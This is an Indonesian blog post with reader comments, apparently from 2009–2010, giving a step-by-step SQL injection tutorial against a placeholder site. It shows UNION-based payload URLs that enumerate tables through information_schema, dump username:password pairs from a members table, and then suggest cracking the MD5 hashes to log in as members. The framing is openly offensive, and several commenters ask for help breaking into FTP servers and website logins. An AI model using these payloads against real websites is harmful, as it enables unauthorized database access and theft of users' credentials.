sql injection(mencari pasword & username suatu web dan data penting lainnya)
by viyan_cs on Sat May 09, 2009 2:30 pm
di postingan kali ini akan saya terangkan step by step bagaimana hacker menyusup ke dalam sistem dan mengexploitasi hole dengan sql injection
http://(target).com/path/newsdetail.php?id=15(untuk alamat bisa anda cari sendiri tergantung kreatifitas)
langkahnya:
1. cek dulu apakah website tuh error sqlnya?
http://(target).com/path/newsdetail.php?id=15' (tanda (') adalah untuk mengetahui apakah web target error sqlnya or tidak)
jika muncul kalimat You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY `date` DESC' at line 1 berarti web target sqlnya error or kalimat yang lainnya yang menunjukan sqlnya tuh error.
2.kita cari column dengan perintah order by..
order by kita gunakan untuk mengurutkan column, jadi jika perintahnya order by 5, maka column yang pertama muncul diurutkan dari column ke-5..atau dalam kata lain kita mencari batasan dari kolom table(menebak2 angka)
misalnya pada target kita ini saia pake http://(target).com/path/newsdetail.php?id=15%20order%20by%207--
ternyata muncul pesan Unknown column '7' in 'order clause'
lalu coba lagi http://(target).com/path/newsdetail.php?id=15%20order%20by%206--
muncul pesan yang sama juga
anda coba lagi dengan http://(target).com/path/newsdetail.php?id=15%20order%20by%205--
website dalam keadaan normal kembali..
intinya disini target menggunakan 5 colomn.
3. sekarang kita lakukan perintah union select diakhiri urutan column dari pertama sampai terakhir, gunanya untuk melihat di angka mana kita bisa lakukan injeksi..
jangan lupa tambahkan tanda "-" diawal angka parameter id, contohnya http://(target).com/path/newsdetail.php?id=-15
dalam prakteknya kita ketikan http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,2,3,4,5--
akan muncul "angka ajaibnya"misal 2 dan 3, disitulah hole yang memulai para hacker untuk melakukan injeksi
selanjutnya melihat versi database,sebelum mencari versi database kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat di database versi 4, jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya..
4.@@version adalah command untuk melihat versi database.. bisa juga dengan menggunakan perintah version()..
dalam prakteknya http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,@@version,3,4,5--
maka di web target muncul 5.0.27-standard-log menandai bahwa web target menggunakan database versi 5.
5.selanjutnya mencari table dari information_schema dengan memasukkan perintah group_concat(table_name) didalam "angka ajaib" kemudian diakhir URL tambahkan from information_schema.tables where table_schema=database()--
dalam prakteknya
http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,
group_concat(table_name),3,4,5%20from%20information_schema.tables
%20where%20table_schema=database()--
jika berhasil maka akan mucul table misal...artists,members,news,newscomments,videocomments,videos
6.sekarang kita akan mengintip informasi di dalam table members, pertama cek column dulu di table admin dengan perintah group_concat(column_name) dan diakhir URL tambahkan from information_schema.columns where table_name='nama table'
dalam prakteknya
http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,
group_concat(column_name),3,4,5%20from%20
information_schema.columns
%20where%20table_name=%27members%27--
error!
table 'members' harus diconvert dulu ke hexa agar dapat dibaca oleh SQL..
dengan catatan, kita harus menambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert ke hexa..
untuk menconvertnya kita tinggal ketikan text to hex convert di google
setelah di convert kata members ke hexa menjadi 6d656d62657273
7. setelah mengkonvert lakukan perintah ini nih..
http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,
group_concat(column_name),3,4,5%20from%20
information_schema.columns%20where%20table_name=0x6d656d62657273%20%20--
jika berhasil akan muncul username and paswordnya dari table members...
misal id,username,password,f_name,l_name,email,dob,sex,address,city,country,aboutme,profilepicture,active_usr,random_usr
8. perintahnya: group_concat(username,0x3a,password) tambahkan diakhir URL from members
dimana 0x3a adalah tanda : yang telah diconvert ke hexa, agar format tampilannya username:password, dan command from members adalah untuk menjalankan perintah untuk mengambil informasi dari table yang bernama members..
http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,group_concat
(username,0x3a,password),3,4,5%20from%20members--
viola data has been hacked
sekarang kita akan login sebagai members, namun user members telah terenkripsi dengan MD5
maka anda harus mengkonvertnya ke text bisa anda cari di google "How to Descrypt MD5"
note:%20 = spasi
last edited 10 nov by viyancs
referensi : http://viyancs.wordpress.com/2010/11/10/sql-injectionmencari-pasword-username-suatu-web-dan-data-penting-lainnya/
bisa minta bantuanya ga pa...
BalasHapuskalo bisa pake vidoe gan..:D (y)
BalasHapusForbidden
BalasHapusYou don't have permission to access /path/newsdetail.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
cara bobol FTP website tanpa mengetahui username & password lewat cmd gimana ya ? dan udah diketahui port yang udah kebuka. Tolong pencerahannya !!!!
BalasHapusItu teknik manual klo pke windows..klo pake linux proses nya bs lbh cpt..sql injection buat melihat isi database..yg isi vcc product.admn + pass yg d enkripsi oleh sql ...kl udh ketemu pass nya nanti di decrypt md5 biar bs kebaca..
BalasHapusbsa bantu saya apa tidak?. saya pngen tahu username dan password website login, tpi udh coba2 bol bisa
HapusMin bisa bantu gak
BalasHapus